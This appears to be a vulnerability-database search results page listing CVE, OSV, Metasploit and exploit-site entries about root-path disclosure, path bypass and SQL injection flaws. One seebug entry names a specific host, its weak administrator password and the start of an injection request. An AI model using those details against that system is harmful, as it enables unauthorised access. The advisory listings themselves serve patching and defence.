
242 matches found

NVD
added 2018/05/31 8:29 p.m., 12 views

CVE-2016-10528

restafary is a REpresentful State Transfer API for Creating, Reading, Using, Deleting files on a server from the web. Restafary before 1.6.1 is able to set up a root path, which should only allow it to run inside of that root path it specified...

CVSS 4.9, AI score 5.1, EPSS 0.01199
Exploits: 1, References: 1
Cvelist
added 2018/05/31 8:0 p.m., 13 views

CVE-2016-10528

restafary is a REpresentful State Transfer API for Creating, Reading, Using, Deleting files on a server from the web. Restafary before 1.6.1 is able to set up a root path, which should only allow it to run inside of that root path it specified...

AI score 5.1, EPSS 0.01199
Exploits: 1, References: 1
CNVD
added 2018/02/01 12:0 a.m., 3 views

NETWAVE IP Camera Denial of Service Vulnerability

Netwave IP Camera devices are network cameras. A security vulnerability exists in Netwave IP Camera devices. An attacker can exploit this vulnerability to cause a denial of service crash by sending a POST request with a large body to the root path...

CVSS 7.8, AI score 6.8, EPSS 0.04585
Exploits: 1, References: 1
OSV
added 2017/10/24 6:33 p.m., 0 views

GHSA-JGQF-HWC5-HH37 Root Path Disclosure in send

Versions of send prior to 0.11.2 are affected by an information leakage vulnerability which may allow an attacker to enumerate paths on the server filesystem. Recommendation: Update to version 0.11.1 or later...

CVSS 5.3, AI score 7.1, EPSS 0.04697
Exploits: 0, References: 7
Metasploit
added 2017/08/02 8:46 p.m., 218 views

LNK Code Execution Vulnerability

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The...

CVSS 8.8, AI score 10, EPSS 0.90026
Exploits: 27
NVD
added 2017/01/23 9:59 p.m., 21 views

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVSS 5.3, AI score 5.2, EPSS 0.04697
Exploits: 0, References: 3
UbuntuCve
added 2017/01/23 9:59 p.m., 20 views

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVSS 5.3, AI score 6.8, EPSS 0.04697
Exploits: 0, References: 3
OSV
added 2017/01/23 9:59 p.m., 1 view

UBUNTU-CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVSS 5.3, AI score 7.2, EPSS 0.04697
Exploits: 0, References: 4
OSV
added 2017/01/23 9:59 p.m., 4 views

AZL-45024 CVE-2015-8859 affecting package nodejs-nodemon 2.0.3-5

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVSS 5.3, AI score 6.7, EPSS 0.04697
Exploits: 0, References: 1
OSV
added 2017/01/23 9:59 p.m., 6 views

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVSS 5.3, AI score 5.2
Exploits: 0, References: 6
OSV
added 2017/01/23 9:59 p.m., 2 views

DEBIAN-CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVSS 5.3, AI score 7, EPSS 0.04697
Exploits: 0, References: 1
Cvelist
added 2017/01/23 9:0 p.m., 31 views

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

AI score 5.2, EPSS 0.04697
Exploits: 0, References: 3
CVE
added 2017/01/23 9:0 p.m., 66 views

CVE-2015-8859

CVE-2015-8859 concerns the Node.js send package prior to 0.11.1, where an information leakage/root path disclosure vulnerability exists via unspecified vectors. Connected sources (GHSA-... and OSV entries) confirm this vulnerability, with remediation advised to upgrade to 0.11.1 or later. Affecte...

CVSS 5.3, AI score 5.1, EPSS 0.04697
Exploits: 0, References: 3, Affected Software: 1
Debian CVE
added 2017/01/23 9:0 p.m., 17 views

CVE-2015-8859

The send package before 0.11.1 for Node.js allows attackers to obtain the root path via unspecified vectors...

CVSS 5.3, AI score 6.3, EPSS 0.04697
Exploits: 0
UbuntuCve
added 2016/09/20 7:59 p.m., 15 views

CVE-2016-6802

Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging use of a non-root servlet context path...

CVSS 7.5, AI score 7.1, EPSS 0.0968
Exploits: 1, References: 3
Positive Technologies
added 2016/02/10 12:0 a.m., 10 views

PT-2017-7491 · Send +1

Name of the Vulnerable Software and Affected Versions: send versions prior to 0.11.1
Description: The issue allows attackers to obtain the root path via unspecified vectors, potentially enabling them to enumerate paths on the server filesystem.
Recommendations: For versions prior to 0.11.1, updat...

CVSS 10, AI score 7, EPSS 0.95326
Exploits: 16, References: 68
0day.today
added 2015/12/08 12:0 a.m., 50 views

GEOVAP Reliance 4 Control Server Privilege Escalation Vulnerability

GEOVAP Reliance 4 Control Server suffers from an unquoted search path issue impacting the service 'RelianceOpcDaWrapper' for Windows deployed as part of Reliance 4 SCADA/HMI system installer including Reliance OPC Server. This could potentially allow an authorized but non-privileged local user to...

AI score 7.6
Exploits: 0
seebug.org
added 2015/10/22 12:0 a.m., 75 views

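A Yonyou system: from weak password to SQL injection to getshell

Brief description: weak password, SQL injection, getshell. Details: System address: http://vip.ufida.com.cn/Frame/Index.aspx Weak-password account: adminnc Password: adminnc. An injection was found in the self-service query feature (login required; note that the cookie expires). GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1 Accept: text/html, application/xhtml+xml, /...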

AI score 7.1
Exploits: 0
Metasploit
added 2014/08/22 4:44 p.m., 52 views

ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection

This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet, which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and Password Manager Pro v6 build 6500 to v7 build 7002 including the MSP versions. The SQL injection can be used to achieve remot...

CVSS 7.5, AI score 8.8, EPSS 0.35547
Exploits: 12
0day.today
added 2014/08/22 12:0 a.m., 68 views

ManageEngine Password Manager MetadataServlet.dat SQL Injection Exploit

This Metasploit module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet, which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and Password Manager Pro v6 build 6500 to v7 build 7002 including the MSP versions. The SQL injection can be used to...

CVSS 7.5, AI score 8, EPSS 0.35547
Exploits: 12